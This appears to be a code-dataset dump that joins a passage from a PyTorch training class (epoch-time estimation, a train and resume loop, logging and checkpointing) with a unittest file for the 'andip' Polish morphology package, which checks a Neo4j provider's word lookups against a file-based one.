@accepts("self", verbose=int, post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def __init__(self, verbose=1):
super().__init__(verbose=verbose);
###############################################################################################################################################
@accepts("self", post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def get_training_estimate(self):
'''
Get estimated time for training a single epoch based on all set parameters
Args:
None
Returns:
float: Total time per epoch in seconds
'''
total_time_per_epoch = 0;
self.system_dict = load_optimizer(self.system_dict);
self.system_dict = load_scheduler(self.system_dict);
self.system_dict = load_loss(self.system_dict);
since = time.time();
for phase in ['train', 'val']:
if phase == 'train':
self.system_dict["local"]["model"].train()
else:
self.system_dict["local"]["model"].eval()
running_loss = 0.0
running_corrects = 0
required_iters = len(self.system_dict["local"]["data_loaders"][phase])//10;
current_iter = 0;
for inputs, labels in self.system_dict["local"]["data_loaders"][phase]:
inputs = inputs.to(self.system_dict["local"]["device"]);
labels = labels.to(self.system_dict["local"]["device"]);
self.system_dict["local"]["optimizer"].zero_grad();
with torch.set_grad_enabled(phase == 'train'):
if(self.system_dict["model"]["params"]["model_name"]):
if "inception" in self.system_dict["model"]["params"]["model_name"] and phase == 'train':
outputs, aux_outputs = self.system_dict["local"]["model"](inputs)
loss1 = self.system_dict["local"]["criterion"](outputs, labels)
loss2 = self.system_dict["local"]["criterion"](aux_outputs, labels)
loss = loss1 + 0.4*loss2
else:
outputs = self.system_dict["local"]["model"](inputs)
loss = self.system_dict["local"]["criterion"](outputs, labels)
else:
outputs = self.system_dict["local"]["model"](inputs)
loss = self.system_dict["local"]["criterion"](outputs, labels)
_, preds = torch.max(outputs, 1)
if phase == 'train':
loss.backward()
self.system_dict["local"]["optimizer"].step()
running_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds == labels.data)
current_iter += 1;
if(current_iter >= required_iters):
break;
total_time_per_epoch = (time.time() - since)*10;
return total_time_per_epoch;
###############################################################################################################################################
###############################################################################################################################################
@accepts("self", post_trace=False)
#@TraceFunction(trace_args=True, trace_rv=True)
def set_training_final(self):
'''
Main training function
Args:
None
Returns:
None
'''
if(self.system_dict["states"]["resume_train"]):
self.custom_print("Training Resume");
total_time_per_epoch = 0;
self.system_dict = load_optimizer(self.system_dict);
self.system_dict = load_scheduler(self.system_dict);
self.system_dict = load_loss(self.system_dict);
self.system_dict["training"]["status"] = False;
pid = os.getpid();
if(self.system_dict["training"]["settings"]["save_training_logs"]):
val_acc_history = list(np.load(self.system_dict["log_dir"] + "val_acc_history.npy", allow_pickle=True));
train_acc_history = list(np.load(self.system_dict["log_dir"] + "train_acc_history.npy", allow_pickle=True));
val_loss_history = list(np.load(self.system_dict["log_dir"] + "val_loss_history.npy", allow_pickle=True));
train_loss_history = list(np.load(self.system_dict["log_dir"] + "train_loss_history.npy", allow_pickle=True));
best_acc = 0.0;
best_acc_epoch = 0;
max_gpu_usage = 0;
best_model_wts = copy.deepcopy(self.system_dict["local"]["model"].state_dict());
for epoch in range(self.system_dict["hyper-parameters"]["num_epochs"]):
if(self.system_dict["training"]["settings"]["display_progress"]):
self.custom_print(' Epoch {}/{}'.format(epoch+1, self.system_dict["hyper-parameters"]["num_epochs"]))
self.custom_print(' ' + '-' * 10)
if(epoch < self.system_dict["training"]["outputs"]["epochs_completed"]):
self.custom_print("Skipping Current Epoch");
self.custom_print("");
self.custom_print("");
continue;
since = time.time();
for phase in ['train', 'val']:
if(self.system_dict["training"]["settings"]["display_progress_realtime"] and self.system_dict["verbose"]):
pbar=tqdm(total=len(self.system_dict["local"]["data_loaders"][phase]));
if phase == 'train':
self.system_dict["local"]["model"].train()
else:
self.system_dict["local"]["model"].eval()
running_loss = 0.0
running_corrects = 0
total_labels = 0
for inputs, labels in self.system_dict["local"]["data_loaders"][phase]:
if(self.system_dict["training"]["settings"]["display_progress_realtime"] and self.system_dict["verbose"]):
pbar.update();
inputs = inputs.to(self.system_dict["local"]["device"]);
labels = labels.to(self.system_dict["local"]["device"]);
self.system_dict["local"]["optimizer"].zero_grad();
with torch.set_grad_enabled(phase == 'train'):
if(self.system_dict["model"]["params"]["model_name"]):
if "inception" in self.system_dict["model"]["params"]["model_name"] and phase == 'train':
outputs, aux_outputs = self.system_dict["local"]["model"](inputs)
loss1 = self.system_dict["local"]["criterion"](outputs, labels)
loss2 = self.system_dict["local"]["criterion"](aux_outputs, labels)
loss = loss1 + 0.4*loss2
else:
outputs = self.system_dict["local"]["model"](inputs)
loss = self.system_dict["local"]["criterion"](outputs, labels)
else:
outputs = self.system_dict["local"]["model"](inputs)
loss = self.system_dict["local"]["criterion"](outputs, labels)
_, preds = torch.max(outputs, 1)
if phase == 'train':
loss.backward()
self.system_dict["local"]["optimizer"].step()
running_loss += loss.item() * inputs.size(0)
if(self.system_dict["dataset"]["label_type"] == "single"):
running_corrects += torch.sum(preds == labels.data)
else:
labels = labels.cpu().detach().numpy()[0]
list_classes = [];
list_labels = [];
raw_scores = outputs.cpu().detach().numpy()[0];
for i in range(len(raw_scores)):
prob = logistic.cdf(raw_scores[i])
if(prob > 0.5):
list_classes.append(self.system_dict["dataset"]["params"]["classes"][i])
for i in range(len(labels)):
if(labels[i]):
list_labels.append(self.system_dict["dataset"]["params"]["classes"][i])
for i in range(len(list_labels)):
actual = list_labels[i];
if actual in list_classes:
correct = True;
else:
correct = False;
index = self.system_dict["dataset"]["params"]["classes"].index(actual);
total_labels += 1;
if(correct):
running_corrects += 1;
epoch_loss = running_loss / len(self.system_dict["local"]["data_loaders"][phase].dataset)
if(self.system_dict["dataset"]["label_type"] == "single"):
epoch_acc = running_corrects.double() / len(self.system_dict["local"]["data_loaders"][phase].dataset)
else:
epoch_acc = running_corrects/total_labels;
if(not os.getcwd() == "/kaggle/working"):
if(self.system_dict["model"]["params"]["use_gpu"]):
GPUs = GPUtil.getGPUs()
gpuMemoryUsed = GPUs[0].memoryUsed
if(self.system_dict["training"]["outputs"]["max_gpu_memory_usage"] < int(gpuMemoryUsed)):
self.system_dict["training"]["outputs"]["max_gpu_memory_usage"] = int(gpuMemoryUsed);
else:
gpuMemoryUsed = 0;
self.system_dict["training"]["outputs"]["max_gpu_memory_usage"] = 0;
if(self.system_dict["training"]["settings"]["save_training_logs"]):
if(self.system_dict["dataset"]["label_type"] == "single"):
if phase == 'val':
val_acc = epoch_acc;
val_loss = epoch_loss;
val_acc_history.append(epoch_acc.cpu().detach().numpy());
val_loss_history.append(epoch_loss);
else:
train_acc = epoch_acc;
train_loss = epoch_loss;
train_acc_history.append(epoch_acc.cpu().detach().numpy());
train_loss_history.append(epoch_loss);
else:
if phase == 'val':
val_acc = epoch_acc;
val_loss = epoch_loss;
val_acc_history.append(epoch_acc);
val_loss_history.append(epoch_loss);
else:
train_acc = epoch_acc;
train_loss = epoch_loss;
train_acc_history.append(epoch_acc);
train_loss_history.append(epoch_loss);
if(self.system_dict["training"]["settings"]["save_intermediate_models"]):
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] +
self.system_dict["training"]["settings"]["intermediate_model_prefix"] + "{}".format(epoch));
if(self.system_dict["dataset"]["label_type"] == "single"):
if(val_acc > best_acc):
best_acc = val_acc;
best_acc_epoch = epoch;
best_model_wts = copy.deepcopy(self.system_dict["local"]["model"].state_dict());
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] + "best_model");
self.system_dict["training"]["outputs"]["best_val_acc"] = "{:4f}".format(best_acc);
self.system_dict["training"]["outputs"]["best_val_acc_epoch_num"] = best_acc_epoch;
else:
if(val_loss < best_loss):
best_loss = val_loss;
best_acc_epoch = epoch;
best_model_wts = copy.deepcopy(self.system_dict["local"]["model"].state_dict());
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] + "best_model");
self.system_dict["training"]["outputs"]["best_val_acc"] = "{:4f}".format(best_acc);
self.system_dict["training"]["outputs"]["best_val_acc_epoch_num"] = best_acc_epoch;
if(val_acc > best_acc):
best_acc = val_acc;
time_elapsed_since = time.time() - since;
if("training_time" in self.system_dict["training"]["outputs"].keys()):
minutes, seconds = self.system_dict["training"]["outputs"]["training_time"].split(" ");
minutes = int(minutes[:len(minutes)-1]);
seconds = int(seconds[:len(seconds)-1]);
time_elapsed_since += minutes*60 + seconds;
self.system_dict["training"]["outputs"]["training_time"] = "{:.0f}m {:.0f}s".format(time_elapsed_since // 60, time_elapsed_since % 60);
if(self.system_dict["training"]["settings"]["save_training_logs"]):
np.save(self.system_dict["log_dir"] + "val_acc_history.npy", np.array(val_acc_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "val_loss_history.npy", np.array(val_loss_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "train_acc_history.npy", np.array(train_acc_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "train_loss_history.npy", np.array(train_loss_history), allow_pickle=True);
create_train_test_plots_accuracy([train_acc_history, val_acc_history], ["Epoch Num", "Accuracy"], self.system_dict["log_dir"], show_img=False, save_img=True);
create_train_test_plots_loss([train_loss_history, val_loss_history], ["Epoch Num", "Loss"], self.system_dict["log_dir"], show_img=False, save_img=True);
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] + "resume_state");
if(self.system_dict["local"]["learning_rate_scheduler"]):
if(self.system_dict["hyper-parameters"]["learning_rate_scheduler"]["name"] == "reduceonplateaulr"):
self.system_dict["local"]["learning_rate_scheduler"].step(epoch_loss);
else:
self.system_dict["local"]["learning_rate_scheduler"].step();
if(self.system_dict["training"]["settings"]["display_progress_realtime"] and self.system_dict["verbose"]):
self.custom_print("");
self.custom_print("");
if(self.system_dict["training"]["settings"]["display_progress"]):
for param_group in self.system_dict["local"]["optimizer"].param_groups:
curr_lr = param_group['lr'];
self.custom_print(" curr_lr - {}".format(curr_lr));
self.custom_print(' [Epoch %d] Train-acc: %.3f, Train-loss: %.3f | Val-acc: %3f, Val-loss: %.3f, | time: %.1f sec' %
(epoch+1, train_acc, train_loss, val_acc, val_loss, time.time() - since));
self.custom_print("");
self.system_dict["training"]["outputs"]["epochs_completed"] = epoch+1;
save(self.system_dict);
if(self.system_dict["training"]["settings"]["display_progress"]):
self.custom_print(' Training completed in: {:.0f}m {:.0f}s'.format(time_elapsed_since // 60, time_elapsed_since % 60))
self.custom_print(' Best val Acc: {:4f}'.format(best_acc))
self.custom_print("");
elif(self.system_dict["states"]["eval_infer"]):
msg = "Cannot train in testing (eval_infer) mode.\n";
msg += "Tip - use new_experiment function with a copy_from argument.\n";
raise ConstraintError(msg);
else:
self.custom_print("Training Start");
self.system_dict = load_optimizer(self.system_dict);
self.system_dict = load_scheduler(self.system_dict);
self.system_dict = load_loss(self.system_dict);
self.system_dict["training"]["status"] = False;
pid = os.getpid();
if(self.system_dict["training"]["settings"]["save_training_logs"]):
val_acc_history = [];
train_acc_history = [];
val_loss_history = [];
train_loss_history = [];
num_batch_train = len(self.system_dict["local"]["data_loaders"]["train"]);
num_batch_val = len(self.system_dict["local"]["data_loaders"]["val"]);
best_acc = 0.0;
best_loss = 1000.0;
best_acc_epoch = 0;
max_gpu_usage = 0;
best_model_wts = copy.deepcopy(self.system_dict["local"]["model"].state_dict());
for epoch in range(self.system_dict["hyper-parameters"]["num_epochs"]):
if(self.system_dict["training"]["settings"]["display_progress"]):
self.custom_print(' Epoch {}/{}'.format(epoch+1, self.system_dict["hyper-parameters"]["num_epochs"]))
self.custom_print(' ' + '-' * 10)
since = time.time();
for phase in ['train', 'val']:
if(self.system_dict["training"]["settings"]["display_progress_realtime"] and self.system_dict["verbose"]):
pbar=tqdm(total=len(self.system_dict["local"]["data_loaders"][phase]));
if phase == 'train':
self.system_dict["local"]["model"].train()
else:
self.system_dict["local"]["model"].eval()
running_loss = 0.0
running_corrects = 0
total_labels = 0
for inputs, labels in self.system_dict["local"]["data_loaders"][phase]:
if(self.system_dict["training"]["settings"]["display_progress_realtime"] and self.system_dict["verbose"]):
pbar.update();
inputs = inputs.to(self.system_dict["local"]["device"]);
labels = labels.to(self.system_dict["local"]["device"]);
self.system_dict["local"]["optimizer"].zero_grad();
with torch.set_grad_enabled(phase == 'train'):
if(self.system_dict["model"]["params"]["model_name"]):
if "inception" in self.system_dict["model"]["params"]["model_name"] and phase == 'train':
outputs, aux_outputs = self.system_dict["local"]["model"](inputs)
loss1 = self.system_dict["local"]["criterion"](outputs, labels)
loss2 = self.system_dict["local"]["criterion"](aux_outputs, labels)
loss = loss1 + 0.4*loss2
else:
outputs = self.system_dict["local"]["model"](inputs)
loss = self.system_dict["local"]["criterion"](outputs, labels)
else:
outputs = self.system_dict["local"]["model"](inputs)
loss = self.system_dict["local"]["criterion"](outputs, labels)
_, preds = torch.max(outputs, 1)
if phase == 'train':
loss.backward()
self.system_dict["local"]["optimizer"].step()
running_loss += loss.item() * inputs.size(0)
if(self.system_dict["dataset"]["label_type"] == "single"):
running_corrects += torch.sum(preds == labels.data)
else:
labels = labels.cpu().detach().numpy()[0]
list_classes = [];
list_labels = [];
raw_scores = outputs.cpu().detach().numpy()[0];
for i in range(len(raw_scores)):
prob = logistic.cdf(raw_scores[i])
if(prob > 0.5):
list_classes.append(self.system_dict["dataset"]["params"]["classes"][i])
for i in range(len(labels)):
if(labels[i]):
list_labels.append(self.system_dict["dataset"]["params"]["classes"][i])
for i in range(len(list_labels)):
actual = list_labels[i];
if actual in list_classes:
correct = True;
else:
correct = False;
index = self.system_dict["dataset"]["params"]["classes"].index(actual);
total_labels += 1;
if(correct):
running_corrects += 1;
epoch_loss = running_loss / len(self.system_dict["local"]["data_loaders"][phase].dataset)
if(self.system_dict["dataset"]["label_type"] == "single"):
epoch_acc = running_corrects.double() / len(self.system_dict["local"]["data_loaders"][phase].dataset);
else:
epoch_acc = running_corrects/total_labels;
if(not os.getcwd() == "/kaggle/working"):
if(self.system_dict["model"]["params"]["use_gpu"]):
GPUs = GPUtil.getGPUs()
gpuMemoryUsed = GPUs[0].memoryUsed
if(self.system_dict["training"]["outputs"]["max_gpu_memory_usage"] < int(gpuMemoryUsed)):
self.system_dict["training"]["outputs"]["max_gpu_memory_usage"] = int(gpuMemoryUsed);
else:
gpuMemoryUsed = 0;
self.system_dict["training"]["outputs"]["max_gpu_memory_usage"] = 0;
if(self.system_dict["training"]["settings"]["save_training_logs"]):
if(self.system_dict["dataset"]["label_type"] == "single"):
if phase == 'val':
val_acc = epoch_acc;
val_loss = epoch_loss;
val_acc_history.append(epoch_acc.cpu().detach().numpy());
val_loss_history.append(epoch_loss);
else:
train_acc = epoch_acc;
train_loss = epoch_loss;
train_acc_history.append(epoch_acc.cpu().detach().numpy());
train_loss_history.append(epoch_loss);
else:
if phase == 'val':
val_acc = epoch_acc;
val_loss = epoch_loss;
val_acc_history.append(epoch_acc);
val_loss_history.append(epoch_loss);
else:
train_acc = epoch_acc;
train_loss = epoch_loss;
train_acc_history.append(epoch_acc);
train_loss_history.append(epoch_loss);
if(self.system_dict["training"]["settings"]["save_intermediate_models"]):
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] +
self.system_dict["training"]["settings"]["intermediate_model_prefix"] + "{}".format(epoch));
if(self.system_dict["dataset"]["label_type"] == "single"):
if(val_acc > best_acc):
best_acc = val_acc;
best_acc_epoch = epoch;
best_model_wts = copy.deepcopy(self.system_dict["local"]["model"].state_dict());
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] + "best_model");
self.system_dict["training"]["outputs"]["best_val_acc"] = "{:4f}".format(best_acc);
self.system_dict["training"]["outputs"]["best_val_acc_epoch_num"] = best_acc_epoch;
else:
if(val_loss < best_loss):
best_loss = val_loss;
best_acc_epoch = epoch;
best_model_wts = copy.deepcopy(self.system_dict["local"]["model"].state_dict());
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] + "best_model");
self.system_dict["training"]["outputs"]["best_val_acc"] = "{:4f}".format(best_acc);
self.system_dict["training"]["outputs"]["best_val_acc_epoch_num"] = best_acc_epoch;
if(val_acc > best_acc):
best_acc = val_acc;
time_elapsed_since = time.time() - since;
if("training_time" in self.system_dict["training"]["outputs"].keys()):
minutes, seconds = self.system_dict["training"]["outputs"]["training_time"].split(" ");
minutes = int(minutes[:len(minutes)-1]);
seconds = int(seconds[:len(seconds)-1]);
time_elapsed_since += minutes*60 + seconds;
self.system_dict["training"]["outputs"]["training_time"] = "{:.0f}m {:.0f}s".format(time_elapsed_since // 60, time_elapsed_since % 60);
if(self.system_dict["training"]["settings"]["save_training_logs"]):
np.save(self.system_dict["log_dir"] + "val_acc_history.npy", np.array(val_acc_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "val_loss_history.npy", np.array(val_loss_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "train_acc_history.npy", np.array(train_acc_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "train_loss_history.npy", np.array(train_loss_history), allow_pickle=True);
create_train_test_plots_accuracy([train_acc_history, val_acc_history], ["Epoch Num", "Accuracy"], self.system_dict["log_dir"], show_img=False, save_img=True);
create_train_test_plots_loss([train_loss_history, val_loss_history], ["Epoch Num", "Loss"], self.system_dict["log_dir"], show_img=False, save_img=True);
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] + "resume_state");
if(self.system_dict["local"]["learning_rate_scheduler"]):
if(self.system_dict["hyper-parameters"]["learning_rate_scheduler"]["name"] == "reduceonplateaulr"):
self.system_dict["local"]["learning_rate_scheduler"].step(epoch_loss);
else:
self.system_dict["local"]["learning_rate_scheduler"].step();
if(self.system_dict["training"]["settings"]["display_progress_realtime"] and self.system_dict["verbose"]):
self.custom_print("");
self.custom_print("");
if(self.system_dict["training"]["settings"]["display_progress"]):
for param_group in self.system_dict["local"]["optimizer"].param_groups:
curr_lr = param_group['lr'];
self.custom_print(" curr_lr - {}".format(curr_lr));
self.custom_print(' [Epoch %d] Train-acc: %.3f, Train-loss: %.3f | Val-acc: %3f, Val-loss: %.3f, | time: %.1f sec' %
(epoch+1, train_acc, train_loss, val_acc, val_loss, time.time() - since));
self.custom_print("");
self.system_dict["training"]["outputs"]["epochs_completed"] = epoch+1;
save(self.system_dict);
if(self.system_dict["training"]["settings"]["display_progress"]):
self.custom_print(' Training completed in: {:.0f}m {:.0f}s'.format(time_elapsed_since // 60, time_elapsed_since % 60))
self.custom_print(' Best val Acc: {:4f}'.format(best_acc))
self.custom_print("");
if(not self.system_dict["states"]["eval_infer"]):
self.custom_print("Training End");
self.custom_print("");
self.system_dict["training"]["outputs"]["best_val_acc"] = "{:4f}".format(best_acc);
self.system_dict["training"]["outputs"]["best_val_acc_epoch_num"] = best_acc_epoch;
self.system_dict["training"]["outputs"]["training_time"] = "{:.0f}m {:.0f}s".format(time_elapsed_since // 60, time_elapsed_since % 60);
self.system_dict["training"]["outputs"]["max_gpu_usage"] = str(self.system_dict["training"]["outputs"]["max_gpu_memory_usage"]) + " Mb";
torch.save(self.system_dict["local"]["model"], self.system_dict["model_dir"] + "final");
if(self.system_dict["training"]["settings"]["save_training_logs"]):
self.custom_print("Training Outputs");
self.custom_print(" Model Dir: {}".format(self.system_dict["model_dir"]));
self.custom_print(" Log Dir: {}".format(self.system_dict["log_dir"]));
self.custom_print(" Final model: {}".format("final"));
self.custom_print(" Best model: {}".format("best_model"));
self.custom_print(" Log 1 - Validation accuracy history log: {}".format("val_acc_history.npy"));
self.custom_print(" Log 2 - Validation loss history log: {}".format("val_loss_history.npy"));
self.custom_print(" Log 3 - Training accuracy history log: {}".format("train_acc_history.npy"));
self.custom_print(" Log 4 - Training loss history log: {}".format("train_loss_history.npy"));
self.custom_print(" Log 5 - Training curve: {}".format("train_loss_history.npy"));
self.custom_print(" Log 6 - Validation curve: {}".format("train_loss_history.npy"));
self.custom_print("");
np.save(self.system_dict["log_dir"] + "val_acc_history.npy", np.array(val_acc_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "val_loss_history.npy", np.array(val_loss_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "train_acc_history.npy", np.array(train_acc_history), allow_pickle=True);
np.save(self.system_dict["log_dir"] + "train_loss_history.npy", np.array(train_loss_history), allow_pickle=True);
self.system_dict["training"]["outputs"]["log_val_acc_history"] = self.system_dict["log_dir"] + "val_acc_history.npy";
self.system_dict["training"]["outputs"]["log_val_loss_history"] = self.system_dict["log_dir"] + "val_loss_history.npy";
self.system_dict["training"]["outputs"]["log_train_acc_history"] = self.system_dict["log_dir"] + "train_acc_history.npy";
self.system_dict["training"]["outputs"]["log_train_loss_history"] = self.system_dict["log_dir"] + "train_loss_history.npy";
self.system_dict["training"]["outputs"]["log_val_acc_history_relative"] = self.system_dict["log_dir_relative"] + "val_acc_history.npy";
self.system_dict["training"]["outputs"]["log_val_loss_history_relative"] = self.system_dict["log_dir_relative"] + "val_loss_history.npy";
self.system_dict["training"]["outputs"]["log_train_acc_history_relative"] = self.system_dict["log_dir_relative"] + "train_acc_history.npy";
self.system_dict["training"]["outputs"]["log_train_loss_history_relative"] = self.system_dict["log_dir_relative"] + "train_loss_history.npy";
create_train_test_plots_accuracy([train_acc_history, val_acc_history], ["Epoch Num", "Accuracy"], self.system_dict["log_dir"], show_img=False, save_img=True);
create_train_test_plots_loss([train_loss_history, val_loss_history], ["Epoch Num", "Loss"], self.system_dict["log_dir"], show_img=False, save_img=True);
self.system_dict["training"]["status"] = True;
############################################################################################################################################### | 55.131329 | 178 | 0.507763 | 3,528 | 34,843 | 4.72534 | 0.066893 | 0.140364 | 0.196509 | 0.084338 | 0.919561 | 0.913682 | 0.902345 | 0.88597 | 0.88279 | 0.843621 | 0 | 0.006497 | 0.34179 | 34,843 | 632 | 179 | 55.131329 | 0.720415 | 0.014924 | 0 | 0.859375 | 0 | 0.004464 | 0.185373 | 0.031183 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006696 | false | 0 | 0.006696 | 0 | 0.017857 | 0.087054 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
312c25965a5b8c94c566fa3fb7a28ab32ac321a3 | 9,402 | py | Python | tests/neo4j/polish.py | perfidia/andip | fcafa12385592b577001df09c307e445ff66ef89 | [
"MIT"
] | 2 | 2018-03-23T09:21:25.000Z | 2020-09-09T06:37:04.000Z | tests/neo4j/polish.py | perfidia/andip | fcafa12385592b577001df09c307e445ff66ef89 | [
"MIT"
] | null | null | null | tests/neo4j/polish.py | perfidia/andip | fcafa12385592b577001df09c307e445ff66ef89 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import unittest
from andip import FileProvider
from andip.neo4j import Neo4JProvider
class GraphPolishTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
path = os.getcwd().split(os.sep)
for d in reversed(path[:]):
if d != 'andip':
path.pop()
continue
break
path.append('data')
path.append('polish')
cls.oracle = FileProvider(os.sep.join(path))
conf = "http://localhost:7474/db/data/"
data = eval(open("%s.txt" % os.sep.join(path)).read())
provider = Neo4JProvider(conf)
provider.dropAll()
provider.importData(data)
provider.connect()
cls.graph = provider
def testGetWordPronoun(self):
self.assertEqual(self.oracle.get_word(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'ż'})), self.graph.get_word(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'ż'})))
self.assertEqual(self.oracle.get_word(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'm'})), self.graph.get_word(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'm'})))
self.assertEqual(self.oracle.get_word(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'mnoga', 'osoba': 'trzecia', 'rodzaj': 'm'})), self.graph.get_word(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'mnoga', 'osoba': 'trzecia', 'rodzaj': 'm'})))
self.assertEqual(self.oracle.get_word(('zaimek', 'ja', {'przypadek': 'mianownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'm'})), self.graph.get_word(('zaimek', 'ja', {'przypadek': 'mianownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'm'})))
self.assertEqual(self.oracle.get_word(('zaimek', 'ja', {'przypadek': 'mianownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'ż'})), self.graph.get_word(('zaimek', 'ja', {'przypadek': 'mianownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'ż'})))
self.assertEqual(self.oracle.get_word(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'rodzaj': 'ż'})), self.graph.get_word(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'rodzaj': 'ż'})))
self.assertEqual(self.oracle.get_word(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'rodzaj': 'mos'})), self.graph.get_word(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'rodzaj': 'mos'})))
self.assertEqual(self.oracle.get_word(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'mnoga', 'rodzaj': 'mos'})), self.graph.get_word(('zaimek', 'który', {'przypadek': 'miejscownik', 'liczba': 'mnoga', 'rodzaj': 'mos'})))
def testGetWordVerb(self):
self.assertEqual(self.oracle.get_word(('czasownik', 'następować', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'pierwsza'})), self.graph.get_word(('czasownik', 'następować', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'pierwsza'})))
self.assertEqual(self.oracle.get_word(('czasownik', 'następować', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'})), self.graph.get_word(('czasownik', 'następować', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'})))
self.assertEqual(self.oracle.get_word(('czasownik', 'występować', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'pierwsza'})), self.graph.get_word(('czasownik', 'występować', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'pierwsza'})))
self.assertEqual(self.oracle.get_word(('czasownik', 'występować', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'})), self.graph.get_word(('czasownik', 'występować', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'})))
self.assertEqual(self.oracle.get_word(('czasownik', 'być', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'trzecia'})), self.graph.get_word(('czasownik', 'być', {'forma': 'czas teraźniejszy', 'liczba': 'pojedyncza', 'osoba': 'trzecia'})))
self.assertEqual(self.oracle.get_word(('czasownik', 'być', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'})), self.graph.get_word(('czasownik', 'być', {'forma': 'czas teraźniejszy', 'liczba': 'mnoga', 'osoba': 'trzecia'})))
def testGetWordPreposition(self):
self.assertEqual(self.oracle.get_word(('przyimek', 'z', {'forma': 'z'})), self.graph.get_word(('przyimek', 'z', {'forma': 'z'})))
self.assertEqual(self.oracle.get_word(('przyimek', 'z', {'forma': 'ze'})), self.graph.get_word(('przyimek', 'z', {'forma': 'ze'})))
def testGetWordAdjective(self):
self.assertEqual(self.oracle.get_word(('przymiotnik', 'opis', {'liczba': 'pojedyncza', 'rodzaj': 'm'})), self.graph.get_word(('przymiotnik', 'opis', {'liczba': 'pojedyncza', 'rodzaj': 'm'})))
self.assertEqual(self.oracle.get_word(('przymiotnik', 'opis', {'liczba': 'mnoga', 'rodzaj': 'm'})), self.graph.get_word(('przymiotnik', 'opis', {'liczba': 'mnoga', 'rodzaj': 'm'})))
self.assertEqual(self.oracle.get_word(('przymiotnik', 'opis', {'liczba': 'pojedyncza', 'rodzaj': 'ż'})), self.graph.get_word(('przymiotnik', 'opis', {'liczba': 'pojedyncza', 'rodzaj': 'ż'})))
self.assertEqual(self.oracle.get_word(('przymiotnik', 'opis', {'liczba': 'mnoga', 'rodzaj': 'ż'})), self.graph.get_word(('przymiotnik', 'opis', {'liczba': 'mnoga', 'rodzaj': 'ż'})))
def testGetWordNoun(self):
self.assertEqual(self.oracle.get_word(('rzeczownik', 'znak', {'przypadek': 'dopełniacz', 'liczba': 'pojedyncza'})), self.graph.get_word(('rzeczownik', 'znak', {'przypadek': 'dopełniacz', 'liczba': 'pojedyncza'})))
self.assertEqual(self.oracle.get_word(('rzeczownik', 'znak', {'przypadek': 'dopełniacz', 'liczba': 'mnoga'})), self.graph.get_word(('rzeczownik', 'znak', {'przypadek': 'dopełniacz', 'liczba': 'mnoga'})))
def testGetConfPronoun(self):
self.assertIn(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'ż'}), self.graph.get_conf('niej'))
self.assertIn(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'pojedyncza', 'osoba': 'trzecia', 'rodzaj': 'm'}), self.graph.get_conf('nim'))
self.assertIn(('zaimek', 'ja', {'przypadek': 'miejscownik', 'liczba': 'mnoga', 'osoba': 'trzecia', 'rodzaj': 'm'}), self.graph.get_conf('nich'))
